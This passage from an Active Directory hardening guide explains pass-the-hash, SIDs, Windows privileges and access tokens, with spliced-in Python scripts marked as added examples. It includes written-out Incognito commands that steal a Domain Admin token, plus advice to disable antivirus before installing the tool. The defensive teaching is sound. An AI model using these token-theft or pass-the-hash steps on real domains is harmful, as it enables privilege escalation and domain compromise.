http://blogs.msdn.com/b/openspecification/archive/2011/05/31/windows-configurations-for-kerberossupported-encryption-type.aspx



This setting can cause problems with some applications. You will need to validate the proper operation of your applications after
implementation. I invite you to read the articles below on this subject:

http://technet.microsoft.com/en-us/library/dd560670(v=WS.10).aspx
http://windowsitpro.com/security/q-can-default-encryption-types-kerberos-authentication-protocoluses-windows-7-and-windows-

https://dirteam.com/sander/2014/07/15/security-thoughts-leveraging-ntlm-hashes-using-kerberos-rc4hmac-encryption-aka-aorato-s-active-directory-vulnerability/



4.5.5 C Iles THE TIME SYNC

The Kerberos protocol supports a maximum of 5 minutes time difference (configurable in Kerberos strategies Default Domain Policy).

It is therefore vital to set time synchronization policy. The latter is done (default) through service W32Time. On domain member machines, the
service serves customer
NTP.

Domain member machines synchronize with one of the domain controllers of their domain. The registry entry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters\Type must
have the value NT5DS.

On domain controllers, the W32Time service plays both the role of NTP client and NTP server. Domain controllers must synchronize their time
with the domain controller holding the PDC Emulator role in their domain, or with a controller of the parent or root domain.

In the forest root domain, the domain controllers must synchronize with the PDC Emulator of the root domain.

In turn, this server (the root domain controller holding the PDC Emulator role) must be synchronized with a reliable time source. This requires
setting the registry entry Type to the value NTP and defining an NTP server such as time.windows.com as the time source.

To do this, type the following command:

w32tm /config /computer:<<PDC-FQDN>> /manualpeerlist:time.windows.com /syncfromflags:manual /update

We can then see that the Type registry entry has been set to the value NTP (instead of NT5DS).

What if all your domain controllers are virtual machines?

All virtualization servers (such as Hyper-V, VMware ESX ...) must be synchronized manually and directly with the same time server as the PDC
Emulator of the forest root domain. If you have Hyper-V, apply to the Hyper-V host the same command as for the PDC Emulator:

w32tm /config /computer:<<HyperV>> /manualpeerlist:time.windows.com /syncfromflags:manual /update

For the other virtual machines (including domain controllers), keep the standard settings described above.

http://blogs.technet.com/b/nepapfe/archive/2013/03/01/it-s-simple-time-configuration-in-activedirectory.aspx

http://technet.microsoft.com/fr-fr/library/dd723673(v=ws.10).aspx

4.5.6 FORBID KERBEROS DELEGATION FOR ADMINISTRATOR ACCOUNTS

When Kerberos delegation is enabled, user A sends a forwarded TGT (the user's TGT) to server B. This behaviour is very risky for user
accounts with significant privileges, because an attacker who manages to compromise server B can then elevate his privileges.

A good practice is to set the option Account is sensitive and cannot be delegated on all user accounts with administrative privileges on Active
Directory.

4.6 ELEVATION OF PRIVILEGE WITH THE NTLM PASS THE HASH TECHNIQUE

In the example below it is assumed that the LMHash is disabled. The user has already authenticated with the domain controller using the NTLM
protocol.

Once the user is authenticated on the workstation (local logon), how does he manage to access resources on other machines without having to
re-authenticate every time (without being asked for a login / password)? The Lsass.exe process generates a hash of the user's password (the
NTHASH) and stores it in memory once the logon is performed.

To access network resources, the user performs a network logon. With NTLM, the network logon only requires that the machine has the NTHASH
(the hash of the user's password) to encrypt the challenge sent by the server.

Windows therefore asks for no login / password because it already has this information in memory.

4.6.1 UNDERSTANDING THE NTLM PASS THE HASH ATTACK

Pass-the-hash attacks consist of authenticating not with the user's password but with its fingerprint (the NTHASH). The attacker can
recover the user's NTHASH in several ways:

• By analyzing the memory of the Lsass.exe process.
• Via the registry entries under HKEY_LOCAL_MACHINE\SECURITY.
• By analyzing the contents of the SAM database (HKEY_LOCAL_MACHINE\SAM). This attack works for local accounts of the SAM
database.
• By analyzing the contents of the NTDS.DIT file (Active Directory).

As it is not always possible (even with rainbow tables) to recover the clear-text password from the NTHASH, the attacker simulates a
network logon with NTLM. The details of this exchange are presented below:

1. The attacker sends the user's login in clear text to the server S.

2. The server S generates a random number of 16 bytes (called nonce or challenge) and sends it to the client.

3. The attacker encrypts the challenge with the user's password in NTHASH format, which he has recovered (the response), and sends it to the server
S.

5. The server S sends the user login, the challenge and the response (the challenge encrypted with the user's NTHASH) to the domain controller.

6. The domain controller fetches the NTHASH (the user's password in Active Directory) and encrypts the challenge with it. The domain controller then
compares the result with the response sent by the server S. If they match, the domain controller tells the server S that the authentication is
correct.

7. The server S grants access to the attacker.

The principle is similar with the Kerberos authentication protocol (Pass The Key attack).
If an attacker manages to extract the user's key K_C, he can request a TGT without knowing the user's password. This attack requires modifying
the memory contents of the Lsass.exe process (Netlogon service).

The attacker must then run the klist purge command to remove the existing tickets. The next time the attacker accesses a network resource, a
new TGT will be generated.
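The exchange described in steps 1 to 7 can be replayed offline to see why the NTHASH must be protected like the password itself. The simulation below is an added example, not code from the original document: it models the client, the server S and the domain controller, with the client built from the NT hash only and the domain controller verifying with the NT hash only. It assumes the NTLMv2 computation (HMAC-MD5 as specified in MS-NLMP) in place of the DES-based NTLMv1 response the text describes; the NT hash, account names, AV pairs and timestamp are constructed test values, and the server challenge is 8 bytes as in the specification.

```python
"""Simulation of the NTLM network logon described above, NTLMv2 variant.

Added example, not code from the original document. Three parties are
modelled: the client, server S and the domain controller. Neither the
client nor the domain controller ever needs the clear-text password; both
work from the NT hash, so a stolen NT hash is password-equivalent.
Assumptions: NTLMv2 (HMAC-MD5, MS-NLMP) instead of the DES-based NTLMv1
response; the NT hash, names and timestamp are constructed test values;
the server challenge is 8 bytes as in the specification.
"""
import hashlib
import hmac
import os
import struct

# Constructed NT hash of the victim account (16 bytes). It is not derived
# from a password here, which is exactly the attacker's situation.
SAMPLE_NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")


def ntlmv2_key(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user)+domain in UTF-16LE."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"),
                    hashlib.md5).digest()


def ntlmv2_proof(key: bytes, server_challenge: bytes, temp: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 over the server challenge and the client blob."""
    return hmac.new(key, server_challenge + temp, hashlib.md5).digest()


def build_temp(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """The NTLMv2 client blob ('temp' in MS-NLMP): version, time, nonce, AV pairs."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


class Client:
    """Step 3: holds only the NT hash, whether it was computed from the real
    password or dumped from lsass, the SAM or NTDS.DIT."""

    def __init__(self, user, domain, nt_hash, client_challenge=None, timestamp=0):
        self.user, self.domain = user, domain
        self.key = ntlmv2_key(nt_hash, user, domain)
        self.client_challenge = client_challenge or os.urandom(8)
        self.timestamp = timestamp

    def respond(self, server_challenge: bytes, target_info: bytes) -> dict:
        temp = build_temp(self.timestamp, self.client_challenge, target_info)
        return {"user": self.user, "domain": self.domain, "temp": temp,
                "proof": ntlmv2_proof(self.key, server_challenge, temp)}


class DomainController:
    """Step 6: recompute the proof from the NT hash stored in the directory."""

    def __init__(self, accounts: dict):
        self.accounts = accounts  # {(domain, user): nt_hash}

    def verify(self, server_challenge: bytes, response: dict) -> bool:
        nt_hash = self.accounts.get((response["domain"], response["user"]))
        if nt_hash is None:
            return False
        key = ntlmv2_key(nt_hash, response["user"], response["domain"])
        expected = ntlmv2_proof(key, server_challenge, response["temp"])
        return hmac.compare_digest(expected, response["proof"])


class Server:
    """Server S: issues the challenge (step 2) and forwards login, challenge
    and response to the DC (step 5); it never sees a hash or a password."""

    def __init__(self, dc: DomainController, target_info: bytes):
        self.dc, self.target_info = dc, target_info

    def logon(self, client: Client) -> bool:
        challenge = os.urandom(8)                               # step 2
        response = client.respond(challenge, self.target_info)  # step 3
        return self.dc.verify(challenge, response)              # steps 5 to 7


def run_exchange(client_nt_hash: bytes) -> bool:
    """Full exchange for a constructed account; returns whether S grants access."""
    dc = DomainController({("MSREPORT", "melanie.mathieu"): SAMPLE_NT_HASH})
    # Constructed AV pairs: MsvAvNbDomainName "MSREPORT" followed by MsvAvEOL.
    target_info = b"\x02\x00\x10\x00" + "MSREPORT".encode("utf-16le") + b"\x00" * 4
    server = Server(dc, target_info)
    client = Client("melanie.mathieu", "MSREPORT", client_nt_hash)
    return server.logon(client)


if __name__ == "__main__":
    print("access with the stored NT hash:", run_exchange(SAMPLE_NT_HASH))
    print("access with a wrong NT hash   :", run_exchange(bytes(16)))
```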

4.6.2 PROCEDURE FOR THE NTLM PASS THE HASH ATTACK

The main tools for the NTLM Pass the Hash attack on Windows 7 are:
• The PSEXEC module of Metasploit (smbpass): the tool passes the hash to another machine.
• Tenable smbshell: passes the hash to a machine.

A step-by-step guide is available in the following article: http://www.ldap389.info/2012/11/16/test-d-intrusionactive-directory-pentest/

4.6.3 PROTECTING AGAINST NTLM PASS THE HASH ATTACKS

This attack requires the following prerequisites:

• Obtaining administrator privileges on the compromised machine.
• Having the Debug programs privilege.

To limit the risk of a Pass-The-Hash attack, it is necessary to:

• Prevent users with significant privileges from logging on to local workstations.
• Avoid services or applications running with the System account.
• Avoid using scheduled tasks with the System account.
• Avoid users being local administrators of their machine(s) and / or remove the Debug programs privilege.
• Avoid the local administrator password being the same on all workstations and servers.
• Deploy security updates on workstations and servers.
• Disable NTLM and all its variants (LM, NTLM and NTLM V2). As seen above, this is very complex to implement.

4.7 PROTECT AGAINST KERBEROS TICKET ATTACKS WITH A TOOL SUCH AS MIMIKATZ

See the paragraph Audit the security of your directory in this document.


http://blog.gentilkiwi.com/mimikatz
https://experiences.microsoft.fr/Video/avec-laps-metsys-premunit-un-si-dattaques-par-elevation-deprivileges/fd1a804d-c21d-4bbe-97d7-1697364fe5b5#EDHCoWhxb

5 ACCESS MANAGEMENT WITH ACTIVE DIRECTORY
Access management in the Microsoft Windows world is based on the following elements:
• The SID (Security Identifier).
• Permissions (NTFS permissions, share permissions, permissions on registry entries, permissions on Active Directory objects ...).
• System privileges.
• Processes.
• Access tokens.
We will see in this part how Windows processes and services fit into this model.

5.1 THE SID

A SID is a unique security identifier. User accounts, groups and computer accounts in Active Directory have a SID. User accounts and groups of the
SAM database (local account database) also have a SID.

In Microsoft environments, access control is done using access tokens. An access token contains, among other things, the SID of the user's account and the
SID of each group of which the user is a member, directly or indirectly (group member of another group). A SID is divided into 3 portions (example S-1-5-21-1712426984-1618080182-1209977580-1109):

• S-1-5: indicates that the SID was generated by the Windows authority SECURITY_NT_AUTHORITY.
• 21-1712426984-1618080182-1209977580: represents the unique identifier of the domain.
• 1109: the unique identifier of the resource (a user account in our case).

The SID is stored in the objectSid attribute, which is managed by the system. An administrator cannot change the value of this attribute, nor assign the SID
of a deleted user account to another user account (hence the problem of accidental account deletion).

When giving permissions to the user melanie.mathieu on a folder called Sharing (Security tab), it is the SID of this account that holds the
permissions in the NTFS file system. Windows resolves the SID to a name in the Security tab for user comfort. If you delete the user account
melanie.mathieu and log off / log on again (restart on Windows 2012 R2), the old user account appears as a SID.

Some SIDs are displayed in the following form: S-1-5-32-544, S-1-5-32-545. These are the SIDs of the default groups of the SAM database or of well-known
security principals (Well-known Security Principals) such as Authenticated Users.

The SID (objectSid attribute) should not be confused with the GUID (objectGuid attribute), which is the unique identifier of an object in the Active Directory
forest.

When an account is migrated from one domain (NT4, Samba or Active Directory) to another domain with a migration tool such as Microsoft ADMT or Dell
Migration Manager for Active Directory, the SID of the user account in the former domain (source domain) can be copied into the
SIDHistory attribute of the user account in the new domain (target domain). This allows a smooth migration between two domains. We will see later in this
document that the use of SID History (sidHistory attribute) poses security problems. For more information on migration with Microsoft ADMT, visit
the following links:

http://msreport.free.fr/?p=443
http://www.microsoft.com/en-US/download/details.aspx?id=19188
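The three portions of a SID, its binary storage in objectSid and the way a deleted account ends up displayed as a raw SID can all be worked through in a few functions. The script below is an added example and not code from the original document; it parses the textual SID from this section, converts it to and from the objectSid byte layout, classifies well-known SIDs and RIDs, and simulates the name lookup the Security tab performs (the directory contents are constructed test data).

```python
"""Parse, encode and classify Windows SIDs as stored in objectSid.

Added example, not from the original document. It splits a textual SID into
the three portions described above, converts it to and from the binary form
stored in the objectSid attribute, and shows why a deleted account appears
in an ACL as a raw SID: the name lookup simply has nothing to return.
The directory contents used at the bottom are constructed test data.
"""
import struct

# Fixed by Windows, independent of any directory.
WELL_KNOWN_SIDS = {
    "S-1-1-0": "Everyone",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-18": "Local System",
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
}
WELL_KNOWN_DOMAIN_RIDS = {500: "Administrator", 502: "krbtgt", 512: "Domain Admins",
                          513: "Domain Users", 518: "Schema Admins",
                          519: "Enterprise Admins"}


def parse_sid(sid: str) -> dict:
    """Split 'S-1-5-21-a-b-c-rid' into revision, authority, domain part and RID."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or not 0 <= authority < 2 ** 48 or any(s >= 2 ** 32 for s in subs):
        raise ValueError("malformed SID: %r" % sid)
    domain = subs[:-1] if len(subs) > 1 else []
    return {
        "revision": revision,
        "authority": authority,
        "subauthorities": subs,
        "domain": ("S-%d-%d-%s" % (revision, authority, "-".join(map(str, domain)))
                   if domain else None),
        "rid": subs[-1] if subs else None,
    }


def sid_to_bytes(sid: str) -> bytes:
    """objectSid layout: revision, sub-authority count, 48-bit big-endian
    authority, then each sub-authority as a little-endian uint32."""
    p = parse_sid(sid)
    head = struct.pack("BB", p["revision"], len(p["subauthorities"]))
    auth = p["authority"].to_bytes(6, "big")
    return head + auth + b"".join(struct.pack("<I", s) for s in p["subauthorities"])


def bytes_to_sid(raw: bytes) -> str:
    """Inverse of sid_to_bytes; the length must match the count byte."""
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("SID length does not match sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def classify(sid: str) -> str:
    """Name a SID without consulting a directory: well-known SIDs, well-known
    domain RIDs, or a plain domain account for an S-1-5-21-... SID."""
    if sid in WELL_KNOWN_SIDS:
        return WELL_KNOWN_SIDS[sid]
    p = parse_sid(sid)
    subs = p["subauthorities"]
    if p["authority"] == 5 and subs[:1] == [21] and len(subs) == 5:
        name = WELL_KNOWN_DOMAIN_RIDS.get(p["rid"], "account")
        return "domain %s (RID %d)" % (name, p["rid"])
    return "unknown"


def resolve_acl(sids, directory: dict) -> list:
    """What the Security tab does: map each SID to a name. A deleted account's
    SID has no directory entry any more, so it stays displayed as the raw SID."""
    return [directory.get(s) or WELL_KNOWN_SIDS.get(s) or s for s in sids]


if __name__ == "__main__":
    user_sid = "S-1-5-21-1712426984-1618080182-1209977580-1109"
    print(parse_sid(user_sid))
    print(sid_to_bytes(user_sid).hex())
    # Constructed directory: the account was deleted, only the group remains.
    directory = {"S-1-5-21-1712426984-1618080182-1209977580-512": "MSREPORT\\Domain Admins"}
    print(resolve_acl([user_sid, "S-1-5-11"], directory))
```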

5.2 PERMISSIONS

NTFS permissions (Security tab in folder / file properties) are based on 13 permissions. The most important is the Take ownership permission. It allows
becoming the owner of a file / folder. And the owner of a file / folder can change permissions and give access to files / folders.

To view the SID of a user, use the ADSIEDIT.MSC console, the attribute editor in Active Directory Users and Computers and Active Directory
Administrative Center, or the PsGetSid tool (http://technet.microsoft.com/en-us/sysinternals/bb897417.aspx).

The permissions on registry entries are based on 11 permissions. The most important is the Write owner permission. It allows becoming the owner of
the key or registry entry. The owner has the right to change permissions.

The permissions on Active Directory objects are much more complex. I invite you to refer to Part 2 of this document "Good practices for delegating
administration of the Active Directory directory" for more information.

NTFS permissions, registry permissions and Active Directory permissions have a mechanism called inheritance allowing the
permissions of a parent container (folder, registry key or OU for example) to be propagated to child objects (files, registry entries, user / group accounts).
Inheritance can be disabled if required.

If, on a domain controller, a standard user (not a member of the administrative groups) is given the Full Control permission on all files of all disk
volumes, all registry entries and all objects of all Active Directory partitions, the user will have rights almost equivalent to those of a local
administrator of the machine, a domain administrator, an enterprise administrator and a schema administrator.

However, he may still be unable to log on to a domain controller. This is because the user does not have the
Allow log on locally privilege.

What happens if you delete the user account that owns a file and it was the only one with rights on the file?

Microsoft handled this case by creating the Take ownership of files or other objects privilege for administrators. We will see that this
privilege allows a local administrator, by default, to become the owner of a file (among others) and thus change the permissions on this file.

5.3 PRIVILEGES

Privileges are rights given to a user, such as being able to bypass NTFS permissions (Take ownership of files or other objects), access the
memory used by all processes (Debug programs) or log on locally (Allow log on locally).

There are 44 privileges on a Windows Server 2012 R2 machine, and they are configured as GPO settings under Computer Configuration |
Policies | Windows Settings | Security Settings | Local Policies | User Rights Assignment.

The Microsoft article below presents each of these settings in detail:

http://technet.microsoft.com/en-us/library/db585464-a2be-41b1-b781e9845182f4b6(v=ws.10)#BKMK_2

The Administrator and System accounts have all rights on a Windows machine because they have Full Control on almost all system
components (files, registry entries ...) and hold almost all privileges. The Microsoft article http://technet.microsoft.com/en-us/library/bb457125.aspx explains
the concept of privilege on a Windows system in detail.

The privileges with the most significant impact on the security of Active Directory are described below.

• Act as part of the operating system (SeTcbPrivilege): this privilege allows bypassing certain controls during logon. It is reserved
for the processes expected to open user sessions. Winlogon.exe and the seclogon service need this privilege. It is recommended to give this
privilege to no one. By default, it is not assigned to anyone.

• Add workstations to domain (SeMachineAccountPrivilege): allows adding a machine to the domain (up to 10 workstations by default). By default this
privilege is granted to the Authenticated Users group. If you do not want a standard user to be able to join a machine to the domain, this privilege must be
reconfigured.

• Back up files and directories (SeBackupPrivilege): allows backing up data even without permissions. This privilege is very critical and is granted to
the Backup Operators and Server Operators groups. It is for this reason that content administrators should not be members of these two
groups.

• Create a token object (SeCreateTokenPrivilege): this privilege allows creating an access token. It is not granted to any user account and it must
remain so.

• Debug programs (SeDebugPrivilege): this right allows a user to open any process to access its memory and copy its resources. The
INCOGNITO.EXE tool (presented later in this document) relies on this privilege. Normally, no production service should rely on this
privilege; it is generally used for application development and advanced troubleshooting. By default, Administrators have this privilege.
Ideally, no one should have it. It should be enabled on demand, or a dedicated security group should be created for it.

• Enable computer and user accounts to be trusted for delegation (SeEnableDelegationPrivilege): defines who can authorize
a user / computer to perform Kerberos delegation.

• Generate security audits (SeAuditPrivilege): determines who can generate events in the Security log. This privilege is important because
there is a group policy setting that blocks logon when the Security log is full (except for administrators). An attacker could generate
thousands of audit events for the sole purpose of blocking logon for standard users.

• Impersonate a client after authentication (SeImpersonatePrivilege): allows a process to assume the identity of a user who has
authenticated. The relevance of leaving this privilege to administrators should be studied. By default, Administrators, SERVICE, LOCAL
SERVICE and NETWORK SERVICE have this privilege.

• Manage auditing and security log (SeSecurityPrivilege): determines who can view and clear the Security log. By default administrators
have this right. Only the people in charge of monitoring actions on the directory (audits and controls) should have the right to clear the Security log
on the domain controllers.

• Restore files and directories (SeRestorePrivilege): determines the user accounts that can override permissions during restore
operations. The user has the equivalent of the NTFS permissions Traverse Folder / Execute File and Write.

• Take ownership of files or other objects (SeTakeOwnershipPrivilege): allows becoming the owner of a file or registry key (among others)
and thus redefining the NTFS permissions on the file or registry key.

There are also privileges that allow or deny interactive logon (locally or via Remote Desktop) or logon as a scheduled task. These privileges
must be configured carefully.
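A quick way to check which of the privileges listed above a given account actually holds on a machine is to read the token itself. The script below, an added example that is not part of the original document, parses the table printed by whoami /priv (the sample output it parses is constructed) and reports the high-risk privileges present in the token, including the three the Incognito tool needs; a privilege shown as Disabled is still held and can be enabled by any process of that user, so the report counts it regardless of state.

```python
"""Flag high-risk privileges in the output of 'whoami /priv'.

Added example, not from the original document. It parses the table printed
by 'whoami /priv' and reports the privileges singled out above whenever
they are present in the token: 'Disabled' only means the current process
has not enabled the privilege yet, not that the user lacks it. The output
below is a constructed sample for a member of the local Administrators group.
"""
import re

# Privileges from the list above with the biggest impact on AD security.
HIGH_RISK = {
    "SeTcbPrivilege": "Act as part of the operating system",
    "SeBackupPrivilege": "Back up files and directories",
    "SeRestorePrivilege": "Restore files and directories",
    "SeCreateTokenPrivilege": "Create a token object",
    "SeDebugPrivilege": "Debug programs",
    "SeEnableDelegationPrivilege": "Enable computer and user accounts to be trusted for delegation",
    "SeAuditPrivilege": "Generate security audits",
    "SeImpersonatePrivilege": "Impersonate a client after authentication",
    "SeSecurityPrivilege": "Manage auditing and security log",
    "SeAssignPrimaryTokenPrivilege": "Replace a process level token",
    "SeTakeOwnershipPrivilege": "Take ownership of files or other objects",
}
# The three privileges the Incognito tool requires (see section 5.7).
INCOGNITO_SET = {"SeDebugPrivilege", "SeAssignPrimaryTokenPrivilege", "SeImpersonatePrivilege"}

# One table row: name, free-text description, then the state column.
ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(output: str) -> dict:
    """Return {privilege_name: state} from the text of 'whoami /priv'."""
    privs = {}
    for line in output.splitlines():
        m = ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def report(privs: dict) -> dict:
    """High-risk privileges held (any state), those enabled right now, and
    whether the token already carries everything Incognito needs."""
    held = set(privs)
    risky = sorted(held & set(HIGH_RISK))
    return {
        "risky": risky,
        "enabled_now": sorted(p for p in risky if privs[p] == "Enabled"),
        "incognito_ready": INCOGNITO_SET <= held,
    }


# Constructed sample of 'whoami /priv' for a local administrator's token.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeDebugPrivilege              Debug programs                            Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
"""

if __name__ == "__main__":
    token = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for key, value in report(token).items():
        print(key, ":", value)
```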

5.4 PROCESSES

A process is created for each executable that starts on the Windows system (service or application). You can see the list of processes in Task
Manager (Details tab on Windows 2012 R2). You can customize the columns displayed, including the executable that generated the
process, its memory consumption and the context of the process (the user account, security principal, MSA or gMSA running the process).

5.5 SERVICES

To view and configure services, you can use the MMC console SERVICES.MSC or edit the registry entries under HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Services.
Services are executables that start automatically or manually in the context of an account. Services can run in the context of a user account,
a security principal (System, Local System, Network Service ...), an MSA or a gMSA. The NETLOGON service runs with the System account (Local
System account) and runs the executable c:\windows\system32\lsass.exe.

Some services perform specific actions if the service stops incorrectly. The Remote Procedure Call (RPC) service reboots the machine when
the RPC service stops improperly. The BLASTER virus caused a crash of the RPC service using a security flaw described in the article http://support.microsoft.com/kb/8269
with the sole purpose of forcing a reboot.

Windows uses SVCHOST (C:\windows\system32\svchost.exe) to load certain Windows services. Multiple instances of Svchost.exe can run
simultaneously. Each instance can run one or more services (called a service group). All service groups managed by SVCHOST are listed in the
following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost

All services of the same SVCHOST service group run in the same process (c:\windows\system32\svchost -k <svchost_service_group_name>)
and therefore in the context of the same account. This can be seen in Windows Task Manager (Processes tab). The Services tab of Task Manager
shows the different SVCHOST service groups.

For more information on SVCHOST: http://support.microsoft.com/kb/314056/fr

Since Windows Server 2008 R1, Microsoft has included a mechanism called Windows Service Hardening to better protect services against
attacks. This feature requires the Windows Firewall service to be started. This service should not be stopped. To turn off the Windows firewall
without stopping the Windows Firewall service, set the 3 firewall profiles to Off.

With Windows Service Hardening, each service can now have a SID. This is defined in the SidType parameter of the service, which can have 3 values:

• None: the service does not have a SID.
• Unrestricted: the service has a SID.
• Restricted: the service has a SID and a restricted token (same principle as UAC). Each service can then have a SID, which
allows giving rights on the file system and on Windows registry entries to this service.

Examples with the DHCP Client service:

I invite you to read these two articles for more information on the Windows Service Hardening functionality.

http://blogs.technet.com/b/askperf/archive/2008/02/03/ws2008-windows-service-hardening.aspx
http://blogs.msdn.com/b/sql_protocols/archive/2009/09/21/connection-from-a-windows-service-couldbe-blocked-by-firewall-even-if-firewall-is-disabled.aspx

5.6 THE ACCESS TOKEN

An access token is generated by the Lsass.exe process (Netlogon service) once the user is authenticated with the Kerberos or
NTLM protocol. An access token contains:
• The SID and SID History of the user account.
• The SID and SID History of all domain groups of which the user is a member, directly or indirectly (group member of another group ...).
• The SID of all local SAM groups to which the user belongs (such as Administrators).
• The list of privileges (such as SeDebugPrivilege) available to the user on the local machine.

To view the contents of an access token, you can use the TokenSz tool, downloadable at: http://www.microsoft.com/en-us/download/details.aspx?id=1448

The command below lists the SID of the user account, the SIDs of the groups to which he belongs directly (or indirectly) and all his privileges.

tokensz.exe /compute_tokensize /dump_groups

If one is authenticated with the Kerberos protocol, the access token is generated from the information in the PAC field of the TGT. The PAC field contains the SID of the
user account and of all the groups to which the user belongs directly or indirectly.

The access token created during the interactive logon (the user enters his login / password) is called the primary access token (Primary Access
Token).
Each time a process is started by the user, a copy of the primary access token is attached to this process. Whenever a process requires an access
(NTFS permission) or a privilege on the system, Windows analyzes the content of this token to validate whether or not the user has the right
to access the resource. To understand access tokens in more detail, I invite you to read the following Microsoft articles:

http://blogs.technet.com/b/askds/archive/2007/11/02/what-s-in-a-token.aspx
http://technet.microsoft.com/en-us/library/cc759267(v=ws.10).aspx

Sometimes a process runs in the context of user account A but needs to perform another task in the context of user B. Each of these tasks
is called a thread. By default a thread uses the access token of the process, called the primary access token (Primary Access Token). In this example the primary
access token has the rights of user A. If the thread needs to run in the context of user B, it uses the impersonation token functionality, which allows the
thread to run in the context of user account B.

Example of a file server (also applicable to a web server):

The Server service (file sharing) runs in the context of the System account and manages access to file shares. When a user connects to a file
server, the Server service generates an access token in the context of the user account to control access to the user's resources.

To perform this impersonation, the file sharing service process must have the Impersonate a client after authentication (SeImpersonatePrivilege) privilege.

For more information about access tokens and impersonation:

http://blogs.technet.com/b/askds/archive/2008/01/11/what-s-in-a-token-part-2-impersonation.aspx
http://technet.microsoft.com/en-us/library/cc783557(v=ws.10).aspx

5.7 ELEVATION OF PRIVILEGE BY ACCESS TOKEN THEFT

5.7.1 PRESENTATION OF THE INCOGNITO TOOL

The Incognito tool is available at the following address: http://sourceforge.net/projects/incognito/

Many antivirus products detect it as a security threat. It will be necessary to install it on a machine whose antivirus real-time scanning is disabled.
Incognito is also integrated in the Metasploit tool.

The INCOGNITO tool steals existing access tokens and uses them to perform tasks. It requires the privileges SeDebugPrivilege,
SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege to work. INCOGNITO must run as System.

Incognito can run locally or remotely. Once started, it scans all processes running on the target machine and lists all the access tokens
associated with these processes.

INCOGNITO duplicates all access tokens and groups them by user. It is at this stage that the tool needs the SeDebugPrivilege (Debug
programs) privilege, because this privilege allows it to open any process to access its memory and copy its resources.

Once the list of access tokens is obtained, the tool is able to launch new processes as another user using the access tokens it copied.
The tool can use the impersonation feature to use the access token associated with a process via the
ImpersonateLoggedOnUser API. This action requires the SeImpersonatePrivilege privilege (Impersonate a client after authentication). For more
information see:
http://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx
The tool then creates a new process and associates it with an access token (using the
CreateProcessAsUser API). This action requires the SeAssignPrimaryTokenPrivilege privilege (Replace a process level token).

For more information :


http://www.offensive-security.com/metasploit-unleashed/Fun_With_Incognito
http://blogs.technet.com/b/askds/archive/2008/01/11/what-s-in-a-token-part-2-impersonation.aspx

5.7.2 PROCEDURE FOR USING THE INCOGNITO TOOL

To list all available tokens, open a command prompt with the System account. To do this, download the PSEXEC tool (http://technet.microsoft.com/fr-fr/sysinternals/b
) and run the following command:

Psexec.exe -i -d -s cmd

Once the command prompt runs as SYSTEM, type the following command:

incognito.exe -h localhost -u administrator -p P@ssword list_tokens -u

Once the access tokens are displayed, those marked Delegation can be stolen and used to launch a command prompt with the following command (it
steals the msreport\administrator token, which in this example is a member of Domain Admins in the qualification environment):

incognito.exe -h localhost -u administrator -p P@ssword execute -c msreport\administrator cmd

Enter the whoami command to check the current user in the command prompt. To remove the processes launched by
Incognito:

incognito.exe -h localhost cleanup

5.7.3 HOW TO BLOCK THE INCOGNITO TOOL?

Prevent users from being local administrators on workstations. Configure the antivirus on all of the company's machines to block the
Metasploit and INCOGNITO executables.

Remove the following Windows privileges through GPO for users who are administrators of their workstation: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege,
SeImpersonatePrivilege.

6 INDUSTRIALIZE AND SECURE THE DEPLOYMENT OF DOMAIN CONTROLLERS
To ensure a high level of security for Active Directory, you must:
• Deploy domain controllers only with a supported version of Windows Server.
• Reduce the attack surface of domain controllers.
• Deploy a standard configuration on all domain controllers.
• Have a deployment process (automated if possible) for the DCs.

6.1 DEPLOY ONLY ONE SUPPORTED VERSION OF WINDOWS SERVER

Microsoft typically supports an operating system for 10 years: 5 years of mainstream support (development of new functionalities) and 5 years of
extended support (bug fixes). When the OS is no longer supported, Microsoft no longer develops security patches and the system becomes
vulnerable to newly discovered security vulnerabilities that are never corrected.

A critical security flaw in the SCHANNEL component was discovered by Microsoft. It would allow an attacker to take control of a machine
on all currently supported Microsoft OS versions. Microsoft provides a patch for this vulnerability in the MS14-066 bulletin (https://technet.microsoft.com/library/security/MS14-
).

Note that Microsoft provides neither information on this vulnerability nor a fix for Windows 2000 Server. Domain controllers running Windows
2000 Server are, however, probably vulnerable to this flaw.

Windows 2003 support ends on July 14, 2015, as described on the Microsoft website
http://support2.microsoft.com/lifecycle/?LN=fr&C2=1163

For all these reasons, you should neither keep nor deploy domain controllers with a version earlier than Windows 2008 R1.

